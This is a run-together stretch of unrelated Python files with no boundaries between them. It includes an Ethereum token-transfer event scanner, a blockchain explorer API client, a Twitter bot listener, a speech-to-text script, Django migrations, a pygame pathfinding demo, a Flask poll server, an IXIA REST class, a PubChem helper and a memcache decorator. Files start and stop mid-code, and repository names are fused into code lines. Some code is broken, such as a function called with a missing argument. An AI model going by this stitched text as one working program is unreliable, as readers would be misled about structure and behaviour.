are valid before start_block (no forks sneaked in). :param start_block: The first block included in the scan :param end_block: The last block included in the scan :param start_chunk_size: How many blocks we try to fetch over JSON-RPC on the first attempt :param progress_callback: If this is an UI application, update the progress of the scan :return: [All processed events, number of chunks used] """ assert start_block <= end_block current_block = start_block # Scan in chunks, commit between chunk_size = start_chunk_size last_scan_duration = last_logs_found = 0 total_chunks_scanned = 0 # All processed entries we got on this scan cycle all_processed = [] while current_block <= end_block: self.state.start_chunk(current_block, chunk_size) # Print some diagnostics to logs to try to fiddle with real world JSON-RPC API performance estimated_end_block = current_block + chunk_size logger.debug( "Scanning token transfers for blocks: %d - %d, chunk size %d, last chunk scan took %f, last logs found %d", current_block, estimated_end_block, chunk_size, last_scan_duration, last_logs_found) start = time.time() actual_end_block, end_block_timestamp, new_entries = self.scan_chunk(current_block, estimated_end_block) # Where does our current chunk scan ends - are we out of chain yet? current_end = actual_end_block last_scan_duration = time.time() - start all_processed += new_entries # Print progress bar if progress_callback: progress_callback(start_block, end_block, current_block, end_block_timestamp, chunk_size, len(new_entries)) # Try to guess how many blocks to fetch over `eth_getLogs` API next time chunk_size = self.estimate_next_chunk_size(chunk_size, len(new_entries)) # Set where the next chunk starts current_block = current_end + 1 total_chunks_scanned += 1 self.state.end_chunk(current_end) return all_processed, total_chunks_scanned def _retry_web3_call(func, start_block, end_block, retries, delay) -> Tuple[int, list]: """A custom retry loop to throttle down block range. If our JSON-RPC server cannot serve all incoming `eth_getLogs` in a single request, we retry and throttle down block range for every retry. For example, Go Ethereum does not indicate what is an acceptable response size. It just fails on the server-side with a "context was cancelled" warning. :param func: A callable that triggers Ethereum JSON-RPC, as func(start_block, end_block) :param start_block: The initial start block of the block range :param end_block: The initial start block of the block range :param retries: How many times we retry :param delay: Time to sleep between retries """ for i in range(retries): try: return end_block, func(start_block, end_block) except Exception as e: # Assume this is HTTPConnectionPool(host='localhost', port=8545): Read timed out. (read timeout=10) # from Go Ethereum. This translates to the error "context was cancelled" on the server side: # https://github.com/ethereum/go-ethereum/issues/20426 if i < retries - 1: # Give some more verbose info than the default middleware logger.warning( "Retrying events for block range %d - %d (%d) failed with %s, retrying in %s seconds", start_block, end_block, end_block-start_block, e, delay) # Decrease the `eth_getBlocks` range end_block = start_block + ((end_block - start_block) // 2) # Let the JSON-RPC to recover e.g. from restart time.sleep(delay) continue else: logger.warning("Out of retries") raise def _fetch_events_for_all_contracts( web3, event, argument_filters: dict, from_block: int, to_block: int) -> Iterable: """Get events using eth_getLogs API. This method is detached from any contract instance. This is a stateless method, as opposed to createFilter. It can be safely called against nodes which do not provide `eth_newFilter` API, like Infura. """ if from_block is None: raise TypeError("Missing mandatory keyword argument to getLogs: fromBlock") # Currently no way to poke this using a public Web3.py API. # This will return raw underlying ABI JSON object for the event abi = event._get_event_abi() # Depending on the Solidity version used to compile # the contract that uses the ABI, # it might have Solidity ABI encoding v1 or v2. # We just assume the default that you set on Web3 object here. # More information here https://eth-abi.readthedocs.io/en/latest/index.html codec: ABICodec = web3.codec # Here we need to poke a bit into Web3 internals, as this # functionality is not exposed by default. # Construct JSON-RPC raw filter presentation based on human readable Python descriptions # Namely, convert event names to their keccak signatures # More information here: # https://github.com/ethereum/web3.py/blob/e176ce0793dafdd0573acc8d4b76425b6eb604ca/web3/_utils/filters.py#L71 data_filter_set, event_filter_params = construct_event_filter_params( abi, codec, address=argument_filters.get("address"), argument_filters=argument_filters, fromBlock=from_block, toBlock=to_block ) logger.debug("Querying eth_getLogs with the following parameters: %s", event_filter_params) # Call JSON-RPC API on your Ethereum node. # get_logs() returns raw AttributedDict entries logs = web3.eth.get_logs(event_filter_params) # Convert raw binary data to Python proxy objects as described by ABI all_events = [] for log in logs: # Convert raw JSON-RPC log result to human readable event by using ABI data # More information how processLog works here # https://github.com/ethereum/web3.py/blob/fbaf1ad11b0c7fac09ba34baff2c256cffe0a148/web3/_utils/events.py#L200 evt = get_event_data(codec, abi, log) # Note: This was originally yield, # but deferring the timeout exception caused the throttle logic not to work all_events.append(evt) return all_events if __name__ == "__main__": # Simple demo that scans all the token transfers of RCC token (11k). # The demo supports persistant state by using a JSON file. # You will need an Ethereum node for this. # Running this script will consume around 20k JSON-RPC calls. # With locally running Geth, the script takes 10 minutes. # The resulting JSON state file is 2.9 MB. import sys import json from web3.providers.rpc import HTTPProvider # We use tqdm library to render a nice progress bar in the console # https://pypi.org/project/tqdm/ from tqdm import tqdm # RCC has around 11k Transfer events # https://etherscan.io/token/0x9b6443b0fb9c241a7fdac375595cea13e6b7807a RCC_ADDRESS = "0x9b6443b0fB9C241A7fdAC375595cEa13e6B7807A" # Reduced ERC-20 ABI, only Transfer event ABI = """[ { "anonymous": false, "inputs": [ { "indexed": true, "name": "from", "type": "address" }, { "indexed": true, "name": "to", "type": "address" }, { "indexed": false, "name": "value", "type": "uint256" } ], "name": "Transfer", "type": "event" } ] """ class JSONifiedState(EventScannerState): """Store the state of scanned blocks and all events. All state is an in-memory dict. Simple load/store massive JSON on start up. """ def __init__(self): self.state = None self.fname = "test-state.json" # How many second ago we saved the JSON file self.last_save = 0 def reset(self): """Create initial state of nothing scanned.""" self.state = { "last_scanned_block": 0, "blocks": {}, } def restore(self): """Restore the last scan state from a file.""" try: self.state = json.load(open(self.fname, "rt")) print(f"Restored the state, previously {self.state['last_scanned_block']} blocks have been scanned") except (IOError, json.decoder.JSONDecodeError): print("State starting from scratch") self.reset() def save(self): """Save everything we have scanned so far in a file.""" with open(self.fname, "wt") as f: json.dump(self.state, f) self.last_save = time.time() # # EventScannerState methods implemented below # def get_last_scanned_block(self): """The number of the last block we have stored.""" return self.state["last_scanned_block"] def delete_data(self, since_block): """Remove potentially reorganised blocks from the scan data.""" for block_num in range(since_block, self.get_last_scanned_block()): if block_num in self.state["blocks"]: del self.state["blocks"][block_num] def start_chunk(self, block_number, chunk_size): pass def end_chunk(self, block_number): """Save at the end of each block, so we can resume in the case of a crash or CTRL+C""" # Next time the scanner is started we will resume from this block self.state["last_scanned_block"] = block_number # Save the database file for every minute if time.time() - self.last_save > 60: self.save() def process_event(self, block_when: datetime.datetime, event: AttributeDict) -> str: """Record a ERC-20 transfer in our database.""" # Events are keyed by their transaction hash and log index # One transaction may contain multiple events # and each one of those gets their own log index # event_name = event.event # "Transfer" log_index = event.logIndex # Log index within the block # transaction_index = event.transactionIndex # Transaction index within the block txhash = event.transactionHash.hex() # Transaction hash block_number = event.blockNumber # Convert ERC-20 Transfer event to our internal format args = event["args"] transfer = { "from": args["from"], "to": args.to, "value": args.value, "timestamp": block_when.isoformat(), } # Create empty dict as the block that contains all transactions by txhash if block_number not in self.state["blocks"]: self.state["blocks"][block_number] = {} block = self.state["blocks"][block_number] if txhash not in block: # We have not yet recorded any transfers in this transaction # (One transaction may contain multiple events if executed by a smart contract). # Create a tx entry that contains all events by a log index self.state["blocks"][block_number][txhash] = {} # Record ERC-20 transfer in our database self.state["blocks"][block_number][txhash][log_index] = transfer # Return a pointer that allows us to look up this event later if needed return f"{block_number}-{txhash}-{log_index}" def run(): if len(sys.argv) < 2: print("Usage: eventscanner.py http://your-node-url") sys.exit(1) api_url = sys.argv[1] # Enable logs to the stdout. # DEBUG is very verbose level logging.basicConfig(level=logging.INFO) provider = HTTPProvider(api_url) # Remove the default JSON-RPC retry middleware # as it correctly cannot handle eth_getLogs block range # throttle down. provider.middlewares.clear() web3 = Web3(provider) # Prepare stub ERC-20 contract object abi = json.loads(ABI) ERC20 = web3.eth.contract(abi=abi) # Restore/create our persistent state state = JSONifiedState() state.restore() # chain_id: int, web3: Web3, abi: dict, state: EventScannerState, events: List, filters: {}, max_chunk_scan_size: int=10000 scanner = EventScanner( web3=web3, contract=ERC20, state=state, events=[ERC20.events.Transfer], filters={"address": RCC_ADDRESS}, # How many maximum blocks at the time we request from JSON-RPC # and we are unlikely to exceed the response size limit of the JSON-RPC server max_chunk_scan_size=10000 ) # Assume we might have scanned the blocks all the way to the last Ethereum block # that mined a few seconds before the previous scan run ended. # Because there might have been a minor Etherueum chain reorganisations # since the last scan ended, we need to discard # the last few blocks from the previous scan results. chain_reorg_safety_blocks = 10 scanner.delete_potentially_forked_block_data(state.get_last_scanned_block() - chain_reorg_safety_blocks) # Scan from [last block scanned] - [latest ethereum block] # Note that our chain reorg safety blocks cannot go negative start_block = max(state.get_last_scanned_block() - chain_reorg_safety_blocks, 0) end_block = scanner.get_suggested_scan_end_block() blocks_to_scan = end_block - start_block print(f"Scanning events from blocks {start_block} - {end_block}") # Render a progress bar in the console start = time.time() with tqdm(total=blocks_to_scan) as progress_bar: def _update_progress(start, end, current, current_block_timestamp, chunk_size, events_count): if current_block_timestamp: formatted_time = current_block_timestamp.strftime("%d-%m-%Y") else: formatted_time = "no block time available" progress_bar.set_description(f"Current block: {current} ({formatted_time}), blocks in a scan batch: {chunk_size}, events processed in a batch {events_count}") progress_bar.update(chunk_size) # Run the scan result, total_chunks_scanned = scanner.scan(start_block, end_block, progress_callback=_update_progress) state.save() duration = time.time() - start print(f"Scanned total {len(result)} Transfer events, in {duration} seconds, total {total_chunks_scanned} chunk scans performed") run()PluskitOfficial/nt_s_common import json import random import time import datetime import hashlib import requests from urllib import parse from nt_s_common import debug, utils, consts, decorator class XmBase(object): def __init__(self): self.host = consts.XM_HOST self.app_id = consts.XM_APP_ID self.app_version = '1.0.0' self.app_secret = consts.XM_APP_SECRET def getSignature(self): '''get signature''' nonce = str(random.randint(1000000000, 9999999999)) timestamp = str(int(datetime.datetime.timestamp(datetime.datetime.now()))) params = sorted([nonce, timestamp, self.app_secret]) sorted_params_str = ''.join(params) # calculate signature sha1 = hashlib.sha1() sha1.update(sorted_params_str.encode()) sign = sha1.hexdigest() return 'signature=%s×tamp=%s&nonce=%s' % (sign, timestamp, nonce) def getHeaders(self): '''set headers''' return { 'AppId': self.app_id, 'AppVersion': self.app_version, 'Signature': self.getSignature(), 'Content-type': 'application/x-www-form-urlencoded' } def fetch(self, url, data, timeout=60, repeat_time=3): for i in range(repeat_time): try: print('request url -------------------------->', url) print('post data -->', data) result = requests.post(url, headers=self.getHeaders(), data=data, timeout=timeout).json() print('response data -->', result) return result except Exception as e: print(e) if i >= repeat_time - 1: return {} else: continue def get_deal_list(self, data={}): """get deals """ url = self.host + '/explorer_v2/block_chain/get_deal_list' return self.fetch(url=url, data=data, timeout=30) def get_message_list(self, data={}): """get msg list""" url = self.host + '/explorer_v2/block_chain/get_message_list' return self.fetch(url=url, data=data, timeout=30) def get_message_info(self, data={}): """get msg details""" url = self.host + '/explorer_v2/block_chain/get_message_info' return self.fetch(url=url, data=data, timeout=30) import logging from responsebot.common.constants import TWITTER_NON_TWEET_EVENTS from responsebot.models import TweetFilter class ResponseBotListener(object): """ Forward received tweets from :class:`~responsebot.responsebot_stream.ResponseBotStream` """ def __init__(self, handler_classes, client): """ Inits the listener and tries to create handler instances from discovered user's handler classes :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes :param client: Some Twitter API client for authentication. E.g. :class:`~responsebot.tweet_client.TweetClient` """ self.client = client self.handlers = [] self.register_handlers(handler_classes) def register_handlers(self, handler_classes): """ Create handlers from discovered handler classes :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes """ for handler_class in handler_classes: self.handlers.append(handler_class(client=self.client)) logging.info('Successfully registered {handler_class}'.format( handler_class=getattr(handler_class, '__name__', str(handler_class))) ) def on_tweet(self, tweet): """ Callback to receive tweet from :class:`~responsebot.responsebot_stream.ResponseBotStream`. Tries to forward the received tweet to registered handlers. :param tweet: An object containing a tweet's text and metadata :type tweet: :class:`~responsebot.models.Tweet` """ logging.info(u'Received tweet: `{message}`'.format(message=tweet.text)) for handler in self.handlers: if not handler.catch_self_tweets and self.is_self_tweet(tweet): continue if not handler.filter.match_tweet(tweet=tweet, user_stream=self.client.config.get('user_stream')): continue handler.on_tweet(tweet) def on_event(self, event): """ Callback to receive events from :class:`~responsebot.responsebot_stream.ResponseBotStream`. Tries to forward the received event to registered handlers. :param event: The received event :type event: :class:`~responsebot.models.Event` error from a custom handler """ if event.event not in TWITTER_NON_TWEET_EVENTS: logging.warning(u'Received unknown twitter event {event}'.format(event=event.event)) return logging.info(u'Received event {event}'.format(event=event.event)) for handler in self.handlers: handler.on_event(event) def is_self_tweet(self, tweet): return self.client.get_current_user().id == tweet.user.id def get_merged_filter(self): """ Return merged filter from list of handlers :return: merged filter :rtype: :class:`~responsebot.models.TweetFilter` """ track = set() follow = set() for handler in self.handlers: track.update(handler.filter.track) follow.update(handler.filter.follow) return TweetFilter(track=list(track), follow=list(follow)) import speech_recognition as sr import argparse import os import itertools import glob import re import logging import datetime import sys import pandas as pd import numpy logging.basicConfig(filename="./log/au_text.log", format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) def get_args(): desc = "is a speech to text script" epilog = ("-a directory of python files audio input -o name_file.txt both" "args are require") parser = argparse.ArgumentParser(description=desc, epilog=epilog, formatter_class=argparse .RawDescriptionHelpFormatter) parser.add_argument('-a', '--audio', help='path to dir audio files to transform in text', required=True) parser.add_argument('-o', '--out', help='name of file output', required=False) ret = parser.parse_args() return ret def audios(input_dirs): input_dirs = [os.path.expanduser(k) for k in input_dirs.strip().split()] # iterator dirs = itertools.chain(*(glob.glob(d) for d in input_dirs)) # generator dirs = [d for d in dirs if os.path.isdir(d)] if len(dirs) == 0: logger.info("No valid directory found!") sys.exit(1) for d in dirs: wavs = glob.glob(d + '/*.wav') if len(wavs) > 1: wavs = sorted(wavs) if len(wavs) == 0: logger.info("No wav file found in {0}".format(d)) sys.exit(1) else: return wavs def read_wav(audio): r = sr.Recognizer() telediario = sr.AudioFile(audio) with telediario as source: audio = r.record(source) return r, audio def audio_text(salida, r, audio, df): salida = salida.split('/')[-1] salida = re.match(r"(\w+)(-)([0-9.]+)(-)([0-9]+)", salida, re.I).groups() start = float(salida[2]) # /16000 end = float(salida[4]) # /16000 index_list = df.index.values true_table = (df['start'] + 1 > start) & (df['start'] - 1 < end) for i in range(len(index_list)): if numpy.bool(true_table[index_list[i]]) is True: last_index = index_list[i] start = int(start/16000) end = int(end/16000) try: csv_row = {'video_name': df['video_name'][last_index], 'label': df.loc[last_index]['label'], 'start_end': f'{start}-{end}', 'text': str(r.recognize_google(audio, language="es"))} row = pd.Series(csv_row) # df['text'][(df['start'] + 1 > start) & (df['start'] - 1 < end)] \ # = str(r.recognize_google(audio, language="es")) except sr.UnknownValueError as e: logger.warning(("couldn't do speech to text due lack of " f"data in audio: {salida[0]} time: {start}-{end}")) csv_row = {'label': df.loc[last_index]['label'], 'start_end': f'{start}-{end}', 'text': ''} row = pd.Series(csv_row) # start1 = str(datetime.timedelta(seconds=start/16000)) # end1 = str(datetime.timedelta(seconds=end/16000)) # df['start-date-time'][(df['start'] + 1 > start) & (df['start'] - 1 < end)]\ # = start1 # df['end-date-time'][(df['start'] + 1 > start) & (df['start'] - 1 < end)]\ # = end1 return row # df.to_csv('exit.csv') if __name__ == '__main__': args = get_args() wavs = audios(args.audio) try: for wav in wavs: r, audio = read_wav(wav) audio_text(wav, r, audio) except Exception as e: logger.warning(f'{e}') from verb_sense_srl.model import SenseSRLModel from verb_sense_srl.predictor import SenseSRLPredictor from verb_sense_srl.reader import SenseSRLReader # Generated by Django 2.1.2 on 2018-10-29 12:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('grafit', '0004_article_related'), ] operations = [ migrations.AlterField( model_name='article', name='related', field=models.ManyToManyField(blank=True, related_name='_article_related_+', to='grafit.Article'), ), migrations.AlterField( model_name='article', name='text', field=models.TextField(blank=True), ), ] main.py import pygame, pygame_gui import bfs, dijkstra, bellman_ford, a_star from random import randint from time import sleep from config import * class Node: def __init__(self, row, col, size): self.row = row self.col = col self.y = row * size self.x = col * size self.color = white self.size = size self.cost = 1 def addPosCost(self): self.cost = randint(0, 40) def addNegPosCost(self): self.cost = randint(-6, 999) def display(self, win): pygame.draw.rect(win, self.color, (self.x, self.y, self.size, self.size)) def drawSquare(win, node): node.display(win) pygame.draw.line(win, grey, (0, node.row * spacing), (size, node.row * spacing)) pygame.draw.line(win, grey, (node.col * spacing, 0), (node.col * spacing, size)) def drawBoard(win, manager, board): win.fill(white) pygame.draw.rect(win, (150, 150, 150), (0, size, size, 100)) for i in range(rows): board[i][0].color = black board[0][i].color = black board[rows - 1][i].color = black board[i][rows - 1].color = black for row in board: for node in row: node.display(win) for i in range(rows): pygame.draw.line(win, grey, (0, i * spacing), (size, i * spacing)) pygame.draw.line(win, grey, (i * spacing, 0), (i * spacing, size)) manager.draw_ui(win) pygame.display.update() def clickedPos(pos): x, y = pos row, col = y // spacing, x // spacing return row, col def main(): pygame.init() win = pygame.display.set_mode((size, size + 100)) pygame.display.set_caption("Shortest Path Finding Algorithms") manager = pygame_gui.UIManager((size, size + 100)) clock = pygame.time.Clock() bfs_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((5/80) * size, size + (1/32) * size), button_size), text = "BFS", manager=manager) dijkstra_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((2/8) * size, size + (1/32) * size), button_size), text = "DIJKSTRA", manager=manager) bellman_ford_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((35/80) * size, size + (1/32) * size), button_size), text = "BELLMAN-FORD", manager=manager) astar_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((5/8) * size, size + (1/32) * size), button_size), text = "A*", manager=manager) reset_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((65/80) * size, size + (1/32) * size), button_size), text = "RESET", manager=manager) board = [[Node(i, j, size // rows) for j in range(rows)] for i in range(rows)] startNode = None endNode = None running = True while running: time_delta = clock.tick(240)/1000.0 drawBoard(win, manager, board) for event in pygame.event.get(): if event.type == pygame.QUIT: running = False manager.process_events(event) if pygame.mouse.get_pressed()[0]: row, col = clickedPos(pygame.mouse.get_pos()) if 0 <= row < rows and 0 <= col < rows: node = board[row][col] if node.color != black: if not startNode: startNode = node startNode.color = yellow elif not endNode and node != startNode: endNode = node endNode.color = purple elif node != endNode and node != startNode: node.color = black elif pygame.mouse.get_pressed()[2]: row, col = clickedPos(pygame.mouse.get_pos()) if 0 <= row < rows and 0 <= col < rows: node = board[row][col] node.color = white if node == startNode: startNode = None elif node == endNode: endNode = None if event.type == pygame.USEREVENT: if event.user_type == pygame_gui.UI_BUTTON_PRESSED: if startNode and endNode: foundPath = None if event.ui_element == bfs_button: foundPath = bfs.BFS(lambda: drawBoard(win, manager, board), board, startNode, endNode) elif event.ui_element == dijkstra_button: for i in range(rows): for j in range(rows): board[i][j].addPosCost() foundPath = dijkstra.dijkstra(lambda: drawBoard(win, manager, board), board, startNode, endNode) elif event.ui_element == bellman_ford_button: for i in range(rows): for j in range(rows): board[i][j].addNegPosCost() foundPath = bellman_ford.BellmanFord(lambda: drawBoard(win, manager, board), win, board, startNode, endNode) if foundPath == False: myFont = pygame.font.SysFont("Comic Sans MS", int((5/80) * size)) text = myFont.render("The negative cycle has occured!", True, green) win.blit(text, (size // rows + (15/800) * size , size // 2)) pygame.display.update() sleep(4) elif event.ui_element == astar_button: foundPath = a_star.a_star(lambda: drawBoard(win, manager, board), board, startNode, endNode) elif event.ui_element == reset_button: startNode, endNode = None, None board = [[Node(i, j, size // rows) for j in range(rows)] for i in range(rows)] if not foundPath: sleep(0.5) startNode, endNode = None, None board = [[Node(i, j, size // rows) for j in range(rows)] for i in range(rows)] manager.update(time_delta) pygame.quit() if __name__ == "__main__": main()import flask import uuid import json from flask import request, url_for from db import couch, vote_view from cloudant.document import Document app = flask.Flask(__name__) @app.route('/', methods=['GET']) def index(): return app.send_static_file('index.html') @app.route('/create', methods=['POST']) def create(): data = request.get_json() data['_id'] = str(uuid.uuid4()) doc = couch.create_document(data) return doc['_id'], 201 @app.route('/poll/', methods=['GET', 'POST']) def read(poll_id): if request.method == 'GET': doc = Document(couch, poll_id) doc.fetch() return doc.json() if request.method == 'POST': data = request.get_json() data['pollID'] = poll_id data['remote_addr'] = request.remote_addr data['user_agent'] = request.headers.get('User-Agent') doc = couch.create_document(data) return doc['_id'], 201 @app.route('/results/', methods=['GET']) def results(poll_id): results = {} for row in vote_view(key=poll_id)['rows']: for key in row['value']['votes']: if key in results: results[key] += 1 else: results[key] = 1 return json.dumps(results) app.run(debug=False, host='0.0.0.0') # Copyright 1997 - 2018 by IXIA Keysight # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from ixnetwork_restpy.base import Base from ixnetwork_restpy.files import Files class GroupDescriptionStatLearnedInformation(Base): """The GroupDescriptionStatLearnedInformation class encapsulates a system managed groupDescriptionStatLearnedInformation node in the ixnetwork hierarchy. An instance of the class can be obtained by accessing the GroupDescriptionStatLearnedInformation property from a parent instance. The internal properties list will be empty when the property is accessed and is populated from the server by using the find method. """ _SDM_NAME = 'groupDescriptionStatLearnedInformation' def __init__(self, parent): super(GroupDescriptionStatLearnedInformation, self).__init__(parent) @property def GroupBucketDescStatLearnedInformation(self): """An instance of the GroupBucketDescStatLearnedInformation class. Returns: obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.openflow.groupbucketdescstatlearnedinformation.GroupBucketDescStatLearnedInformation) Raises: NotFoundError: The requested resource does not exist on the server ServerError: The server has encountered an uncategorized error condition """ from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.openflow.groupbucketdescstatlearnedinformation import GroupBucketDescStatLearnedInformation return GroupBucketDescStatLearnedInformation(self) @property def DataPathId(self): """The Data Path ID of the connected switch. Returns: str """ return self._get_attribute('dataPathId') @property def DataPathIdAsHex(self): """The Data Path ID of the OpenFlow switch in hexadecimal format. Returns: str """ return self._get_attribute('dataPathIdAsHex') @property def ErrorCode(self): """The error code of the error received. Returns: str """ return self._get_attribute('errorCode') @property def ErrorType(self): """The type of the error received. Returns: str """ return self._get_attribute('errorType') @property def GroupId(self): """A 32-bit integer uniquely identifying the group. Returns: number """ return self._get_attribute('groupId') @property def GroupType(self): """Specify the group types supported by Switch. Returns: str """ return self._get_attribute('groupType') @property def Latency(self): """The latency measurement for the OpenFlow channel. Returns: number """ return self._get_attribute('latency') @property def LocalIp(self): """The local IP address of the selected interface. Returns: str """ return self._get_attribute('localIp') @property def NegotiatedVersion(self): """The OpenFlow version supported by this configuration. Returns: str """ return self._get_attribute('negotiatedVersion') @property def NumberOfBucketStats(self): """NOT DEFINED Returns: str """ return self._get_attribute('numberOfBucketStats') @property def RemoteIp(self): """The Remote IP address of the selected interface. Returns: str """ return self._get_attribute('remoteIp') @property def ReplyState(self): """The reply state of the OF Channel. Returns: str """ return self._get_attribute('replyState') def find(self, DataPathId=None, DataPathIdAsHex=None, ErrorCode=None, ErrorType=None, GroupId=None, GroupType=None, Latency=None, LocalIp=None, NegotiatedVersion=None, NumberOfBucketStats=None, RemoteIp=None, ReplyState=None): """Finds and retrieves groupDescriptionStatLearnedInformation data from the server. All named parameters support regex and can be used to selectively retrieve groupDescriptionStatLearnedInformation data from the server. By default the find method takes no parameters and will retrieve all groupDescriptionStatLearnedInformation data from the server. Args: DataPathId (str): The Data Path ID of the connected switch. DataPathIdAsHex (str): The Data Path ID of the OpenFlow switch in hexadecimal format. ErrorCode (str): The error code of the error received. ErrorType (str): The type of the error received. GroupId (number): A 32-bit integer uniquely identifying the group. GroupType (str): Specify the group types supported by Switch. Latency (number): The latency measurement for the OpenFlow channel. LocalIp (str): The local IP address of the selected interface. NegotiatedVersion (str): The OpenFlow version supported by this configuration. NumberOfBucketStats (str): NOT DEFINED RemoteIp (str): The Remote IP address of the selected interface. ReplyState (str): The reply state of the OF Channel. Returns: self: This instance with matching groupDescriptionStatLearnedInformation data retrieved from the server available through an iterator or index Raises: ServerError: The server has encountered an uncategorized error condition """ return self._select(locals()) def read(self, href): """Retrieves a single instance of groupDescriptionStatLearnedInformation data from the server. Args: href (str): An href to the instance to be retrieved Returns: self: This instance with the groupDescriptionStatLearnedInformation data from the server available through an iterator or index Raises: NotFoundError: The requested resource does not exist on the server ServerError: The server has encountered an uncategorized error condition """ return self._read(href) # Generated by Django 3.0.1 on 2020-06-06 20:14 from django.db import migrations, models import django.db.models.deletion import django.db.models.manager class Migration(migrations.Migration): initial = True dependencies = [ ('misc', '0001_initial'), ] operations = [ migrations.CreateModel( name='Tag', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=500)), ], ), migrations.CreateModel( name='WelcomeMessage', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('message', models.CharField(blank=True, max_length=20250)), ('language', models.CharField(choices=[('en', 'English'), ('nl', 'Dutch'), ('fr', 'French'), ('de', 'Deutsch'), ('tr', 'Turkish'), ('pt', 'Portuguese'), ('es', 'Spanish')], default='en', max_length=3)), ('message_type', models.IntegerField(choices=[(0, 'pre-boarding'), (1, 'new hire welcome'), (2, 'text welcome'), (3, 'slack welcome'), (4, 'slack knowledge')], default=0)), ], ), migrations.CreateModel( name='Organization', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=500)), ('language', models.CharField(choices=[('en', 'English'), ('nl', 'Dutch'), ('fr', 'French'), ('de', 'Deutsch'), ('tr', 'Turkish'), ('pt', 'Portuguese'), ('es', 'Spanish')], default='en', max_length=10)), ('timezone', models.CharField(default='UTC', max_length=1000)), ('base_color', models.CharField(default='#99835C', max_length=10)), ('accent_color', models.CharField(default='#ffbb42', max_length=10)), ('bot_color', models.CharField(default='#ffbb42', max_length=10)), ('credentials_login', models.BooleanField(default=True)), ('google_login', models.BooleanField(default=False)), ('slack_login', models.BooleanField(default=False)), ('new_hire_email', models.BooleanField(default=True)), ('new_hire_email_reminders', models.BooleanField(default=True)), ('new_hire_email_overdue_reminders', models.BooleanField(default=False)), ('slack_buttons', models.BooleanField(default=True)), ('ask_colleague_welcome_message', models.BooleanField(default=True)), ('send_new_hire_start_reminder', models.BooleanField(default=False)), ('logo', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='misc.File')), ], managers=[ ('object', django.db.models.manager.Manager()), ], ), ] scripts/pubchem/get_properties.py0 import pandas as pd import pubchempy as pcp def get_properties(dataframe, properties_list, source_column, name_prefix): """This function will retrieve chemical properties from the pubchem database by searching from their cid's. Must input a dataframe, properties list, a source column for which to search based on cid, and a name to give as a prefix for the new columns""" empty_df = pd.DataFrame() # empty df to append results to for i, row in dataframe.iterrows(): # make sure the source column contains the cid's you want to obtain proeprties for cids = row[source_column] # will return the properties as seperate df temporary_df = pcp.get_properties( properties_list, cids, listkey_count=3, as_dataframe=True) # append result to empty dataframe empty_df = temporary_df.append(empty_df) # need to keep original order of results so this will fix that empty_df = empty_df.iloc[::-1] empty_df = empty_df.reset_index() # also resetting index # dropping the cid column from dataframe empty_df = empty_df.drop(['CID'], axis=1) # adding prefix to column names empty_df = empty_df.add_prefix(name_prefix) # concatenating to original dataframe dataframe = pd.concat([dataframe, empty_df], axis=1) return dataframe """ Mark a specific point on a mesh with some text. """ from vtkplotter import Sphere, Point, show, Text sp = Sphere().wireframe(True) pcoords = sp.getPoint(144) pt = Point(pcoords, r=12, c="white") tx = Text("my fave\npoint", pcoords, s=0.1, c="lightblue", bc="green", followcam=False) show(sp, pt, tx, Text(__doc__), axes=1) """memorised module - container for the memorise python-memcache decorator""" __author__ = ' ' __docformat__ = 'restructuredtext en' __version__ = '1.0.1' from functools import wraps from hashlib import md5 import inspect import itertools import memcache from memorised import compat class memorise(object): """Decorate any function or class method/staticmethod with a memcace enabled caching wrapper. Similar to the memoise pattern, this will push mutator operators into memcache.Client.set(), and pull accessor operations from memcache.Client.get(). An MD5 hash of values, such as attributes on the parent instance/class, and arguements, is used as a unique key in memcache. :Parameters: `mc` : memcache.Client The memcache client instance to use. `mc_servers` : list A list of memcache servers to use in the cluster. `parent_keys` : list A list of attributes in the parent instance or class to use for key hashing. `set` : string An attribute present in the parent instance or class to set to the same value as the cached return value. Handy for keeping models in line if attributes are accessed directly in other places, or for pickling instances. `ttl` : integer Tells memcached the time which this value should expire. We default to 0 == cache forever. None is turn off caching. `update` : boolean If `invalidate` is False, Refresh ttl value in cache. If `invalidate` is True, set the cache value to `value` `invalidate` : boolean Invalidates key `value` : object used only if invalidate == True and update == True set the cached value to `value` """ def __init__(self, mc=None, mc_servers=None, parent_keys=[], set=None, ttl=0, update=False, invalidate=False, value=None): # Instance some default values, and customisations self.parent_keys = parent_keys self.set = set self.ttl = ttl self.update = update self.invalidate = invalidate self.value = value if not mc: if not mc_servers: mc_servers = ['localhost:11211'] self.mc = memcache.Client(mc_servers, debug=0) else: self.mc = mc def __call__(self, 